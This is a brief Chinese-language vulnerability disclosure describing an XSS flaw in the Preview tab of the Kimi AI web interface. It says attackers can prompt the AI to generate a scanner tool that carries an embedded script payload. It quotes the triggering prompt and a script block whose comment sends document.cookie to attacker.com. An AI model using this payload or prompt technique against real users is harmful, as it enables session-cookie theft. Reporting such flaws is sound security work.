Kimi AI v1.0 Web 界面的“预览”功能中存在跨站脚本(XSS)漏洞。应用程序未能正确清理或编码由 AI 模型生成的 HTML/JavaScript 载荷。当用户切换到“预览”选项卡查看 AI 生成的代码时,恶意载荷直接渲染到 DOM 中,导致受害者浏览器会话中执行任意 JavaScript。
Mustafa Hameed
攻击者可以通过提示 AI 生成一个包含内置载荷的安全工具(例如,类似 XSStrike 的自动化 XSS 扫描器)来利用此漏洞。AI 生成请求的应用程序源代码,但将恶意载荷嵌入 HTML/JavaScript 框架中。当受害者导航到“预览”选项卡测试或查看生成的工具时,嵌入的恶意载荷绕过清理并立即执行。
“创建一个类似于 XSStrike 的简单基于 Web 的 XSS 扫描器工具。包含一个带有载荷列表的界面以供扫描。”
<script>
alert('mustafa');
// Potential for malicious action: fetch('http://attacker.com/log?cookie=' + document.cookie)
</script>
以下截图展示了 XSS 载荷成功执行的结果。当导航到 “预览” 选项卡时,恶意 JavaScript 立即触发:
